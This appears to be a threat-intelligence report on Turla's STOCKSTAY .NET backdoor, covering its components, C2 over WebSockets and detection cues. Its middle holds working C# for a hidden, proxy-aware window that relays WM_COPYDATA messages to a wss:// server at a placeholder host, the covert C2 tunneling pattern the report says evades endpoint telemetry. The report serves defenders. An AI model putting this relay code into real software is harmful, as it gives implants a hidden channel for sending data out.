The Latest Addition to Turla's Intelligence Gathering Apparatus
Google Threat Intelligence Group (GTIG) has conducted an in-depth analysis of a .NET backdoor, tracked as STOCKSTAY, that has been continually developed and deployed by the Russia-linked threat actor Turla (aka SUMMIT, Secret Blizzard, VENOMOUS BEAR, UAC-0194) since at least December 2022. Turla has deployed STOCKSTAY against government and military organizations in Ukraine, as well as entities with an interest in Italian foreign policy. Used for ongoing cyber espionage, this backdoor shares significant code and functional overlaps with KAZUAR, a successful toolkit previously attributed to Turla. Turla, and specifically its longstanding Snake implant, has been publicly attributed by the United States Cybersecurity and Infrastructure Security Agency (CISA) to Center 16 of Russia’s Federal Security Service (FSB). The actor remains active and continues to evolve its delivery methods, as demonstrated by its deployment of specialized scripts to intercept secure communications from Signal Messenger users, its hijacking of legacy criminal botnets to target Ukrainian organizations, and its recent campaigns targeting military defense sectors using the highly sophisticated KAZUAR toolkit.
STOCKSTAY is a multi-component backdoor written in .NET on the Windows Forms framework. It communicates with its command and control (C2) over a TLS-protected WebSocket connection (wss://), using the open-source websocket-sharp library. The components communicate with one another via an inter-process communication (IPC) channel built on the exchange of WM_COPYDATA window messages. This choice matters for defenders: WM_COPYDATA is delivered synchronously by SendMessage to a target window handle, so the IPC traffic lives entirely inside the window-messaging subsystem and creates none of the named pipes, sockets, or shared-memory sections that endpoint telemetry typically records. STOCKSTAY was originally designed to masquerade as a stock market data viewing tool, and the disguise extends from its file naming scheme to the way it stores implant configuration, control messages, and response data. While the initial versions observed by GTIG retained the internal aspects of this disguise, in 2025 we identified variants of STOCKSTAY masquerading as other benign applications, such as PDF viewers and calculator utilities.
The STOCKSTAY ecosystem includes STOCKSTAY.STOCKBROKER, a proxy-aware tunneler that provides the implant's network communication capabilities. STOCKSTAY.STOCKBROKER can be instructed to establish a secure WebSocket connection to a specified remote server, after which it acts as a relay between that server and the STOCKSTAY.STOCKMARKET orchestrator. STOCKSTAY.STOCKMARKET, internally referred to as “cor”, is the orchestrator of the ecosystem and is the component that makes the implant configurable: it loads the malware's configuration from an encrypted on-disk configuration file that specifies several execution options, including the details of the remote WebSocket server that STOCKSTAY.STOCKBROKER connects to. Finally, STOCKSTAY.STOCKTRADER, internally referred to as “sys”, is the backdoor component of the ecosystem and supports a range of registry, file, and command execution operations on the infected host.
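To make the two mechanisms above concrete for analysts triaging decompiled .NET samples, the following is an added illustration of the design pattern the tunneler and orchestrator rely on: a hidden Windows Forms window that bridges WM_COPYDATA messages to a websocket-sharp client. This is not STOCKSTAY's code and not GTIG's tooling; the window titles, server URL, proxy handling and message tagging are assumptions made for the example, and STOCKSTAY's own message framing and encryption are not reproduced. It targets .NET Framework 4.7 or later on Windows with the WebSocketSharp NuGet package.

```csharp
// Added example: WM_COPYDATA <-> WebSocket relay in the shape of a tunneler/orchestrator pair.
// Not the malware's code. Window titles, URL and proxy values below are assumptions.
using System;
using System.Runtime.InteropServices;
using System.Text;
using System.Windows.Forms;
using WebSocketSharp;   // open-source websocket-sharp library, as used by STOCKSTAY

class RelayForm : Form
{
    const int WM_COPYDATA = 0x004A;

    [StructLayout(LayoutKind.Sequential)]
    struct COPYDATASTRUCT
    {
        public IntPtr dwData;   // caller-defined tag; used here as a message-type marker
        public int cbData;      // byte length of lpData
        public IntPtr lpData;   // payload pointer; valid only for the duration of the SendMessage call
    }

    [DllImport("user32.dll", CharSet = CharSet.Unicode)]
    static extern IntPtr FindWindow(string lpClassName, string lpWindowName);

    [DllImport("user32.dll")]
    static extern IntPtr SendMessage(IntPtr hWnd, int Msg, IntPtr wParam, ref COPYDATASTRUCT lParam);

    readonly WebSocket ws;
    readonly string peerTitle;   // window title of the peer component (assumed rendezvous mechanism)

    public RelayForm(string serverUrl, string peerTitle, string proxyUrl)
    {
        this.peerTitle = peerTitle;
        Text = "ExampleBrokerWindow";                   // title the peer uses to find this window
        ShowInTaskbar = false; Opacity = 0;
        WindowState = FormWindowState.Minimized;        // message-only behaviour: a window without UI

        ws = new WebSocket(serverUrl);                  // wss:// gives TLS via websocket-sharp
        if (proxyUrl != null) ws.SetProxy(proxyUrl, null, null);   // proxy-aware, like the tunneler
        ws.OnMessage += (s, e) =>
            Forward(e.IsBinary ? e.RawData : Encoding.UTF8.GetBytes(e.Data));
    }

    protected override void OnLoad(EventArgs e)
    {
        base.OnLoad(e);      // the window handle exists by now, so WM_COPYDATA can be received
        ws.Connect();
    }

    // Server -> peer: deliver a frame to the peer window through WM_COPYDATA.
    void Forward(byte[] payload)
    {
        IntPtr hPeer = FindWindow(null, peerTitle);
        if (hPeer == IntPtr.Zero) return;               // peer not running; drop the frame
        IntPtr buf = Marshal.AllocHGlobal(payload.Length);
        try
        {
            Marshal.Copy(payload, 0, buf, payload.Length);
            var cds = new COPYDATASTRUCT { dwData = (IntPtr)1, cbData = payload.Length, lpData = buf };
            SendMessage(hPeer, WM_COPYDATA, Handle, ref cds);   // synchronous: returns after the peer handled it
        }
        finally { Marshal.FreeHGlobal(buf); }
    }

    // Peer -> server: any WM_COPYDATA this window receives is sent over the WebSocket.
    protected override void WndProc(ref Message m)
    {
        if (m.Msg == WM_COPYDATA)
        {
            var cds = Marshal.PtrToStructure<COPYDATASTRUCT>(m.LParam);
            var data = new byte[cds.cbData];
            Marshal.Copy(cds.lpData, data, 0, cds.cbData);   // copy out before returning; lpData is transient
            if (ws.IsAlive) ws.Send(data);
            m.Result = (IntPtr)1;                            // non-zero signals "handled" to the sender
            return;
        }
        base.WndProc(ref m);
    }

    [STAThread]
    static void Main()
    {
        // Both values are placeholders for the example; a real deployment would read them from config.
        Application.Run(new RelayForm("wss://example.invalid/ws", "ExampleOrchestratorWindow", null));
    }
}
```

When reviewing a suspect .NET assembly, the combination shown here is what to look for: a Form subclass that overrides WndProc and tests for 0x4A, P/Invoke declarations for FindWindow and SendMessage taking a COPYDATASTRUCT, and a websocket-sharp WebSocket whose URL and SetProxy arguments come from decrypted configuration rather than literals.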
GTIG identified a publicly accessible GitHub repository containing a Python implementation of the victim-facing STOCKSTAY WebSocket server controller. The lightweight design of the server component appears to complement the threat actor’s use of third-party hosting platforms such as Render, which hosts web services, including WebSocket endpoints, on infrastructure the actor does not need to own. Because such endpoints sit behind a legitimate provider, reputation-based blocking of the destination is of limited value; detection is better anchored on the client side, in the implant's behavior on the host. This architecture somewhat resembles Turla’s multi-hop KAZUAR C2 infrastructure. The threat actor(s) involved in STOCKSTAY operations appear to have an affinity for weaving academia and diplomacy into both their infrastructure and their lure and decoy content, including compromising an email account belonging to a Ukrainian university to disseminate phishing emails.